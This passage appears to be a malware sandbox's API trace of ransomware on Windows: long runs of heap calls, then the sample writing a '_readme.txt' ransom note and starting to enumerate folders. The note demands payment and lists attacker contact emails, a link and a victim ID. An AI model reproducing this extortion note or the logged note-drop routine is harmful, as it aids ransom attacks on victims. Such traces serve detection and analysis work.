| out: hHeap=0x6a0000) returned 1 [0178.935] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.935] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0178.935] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.935] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.935] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.935] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0178.935] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0178.935] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.936] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.937] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.937] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.937] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0178.937] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.937] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.937] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.937] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0178.937] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0178.938] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.938] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.938] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.938] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.938] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0178.939] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.939] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.939] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.939] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0178.940] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.940] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.940] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.940] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0178.940] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.941] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.941] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.941] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0178.941] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.941] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.941] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.942] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0178.942] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0178.942] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.942] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.943] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.943] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.943] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0178.943] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.943] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.943] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.943] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0178.943] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.944] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.944] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.944] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0178.944] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.944] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.944] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.944] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0178.945] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.945] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.945] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.945] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0178.945] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.946] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.946] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.946] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0178.946] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.946] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.946] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.946] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0178.947] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.947] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.947] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.947] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0178.948] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.948] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.948] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.948] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0178.948] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.949] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.949] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.949] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0178.949] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0178.949] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.950] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.950] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.950] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.950] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0178.951] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.951] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.951] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.983] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0178.983] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.983] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.983] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.984] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0178.984] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.984] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.984] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.984] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0178.985] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.985] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.985] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.985] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0178.985] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.986] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.986] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.986] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0178.986] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0178.986] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.986] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.987] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.987] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.987] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0178.987] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.987] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.987] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.987] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0178.988] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.988] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.988] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.988] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0178.989] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.989] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.989] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.989] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0178.989] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.990] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.990] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.990] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0178.990] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.991] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.991] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.991] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0178.991] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.991] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.991] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.991] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0178.992] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.992] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.992] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.992] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0178.993] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.993] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.993] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.993] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0178.993] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.994] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.994] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.994] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0178.994] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0178.994] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.994] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.994] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.994] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.995] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0178.995] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.995] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.995] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.995] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0178.995] PathFindFileNameW (pszPath="C:\\Boot\\fr-FR\\") returned="fr-FR\\" [0178.995] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.995] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0178.995] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0178.995] PathFindFileNameW (pszPath="") returned="" [0178.995] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.995] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0178.996] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0178.996] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x800) returned 0x2d2ec90 [0178.996] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2d2ec90 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0178.996] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x810) returned 0x2d154b0 [0178.996] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.996] FreeLibrary (hLibModule=0x759d0000) returned 1 [0178.996] PathAppendW (in: pszPath="C:\\Boot\\fr-FR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\fr-FR\\_readme.txt") returned 1 [0178.996] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0178.996] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.996] PathFileExistsW (pszPath="C:\\Boot\\fr-FR\\_readme.txt") returned 0 [0178.997] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d00) returned 0x2d32670 [0178.997] lstrcpyW (in: lpString1=0x2d32670, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0178.997] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0178.997] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d16e48 [0178.997] CreateFileW (lpFileName="C:\\Boot\\fr-FR\\_readme.txt" (normalized: "c:\\boot\\fr-fr\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.998] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d16e48 | out: hHeap=0x6a0000) returned 1 [0178.999] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32670 | out: hHeap=0x6a0000) returned 1 [0178.999] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.999] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.999] FindFirstFileW (in: lpFileName="C:\\Boot\\fr-FR\\*" (normalized: "c:\\boot\\fr-fr\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d844e0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d844e0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa10 [0179.000] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.000] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, 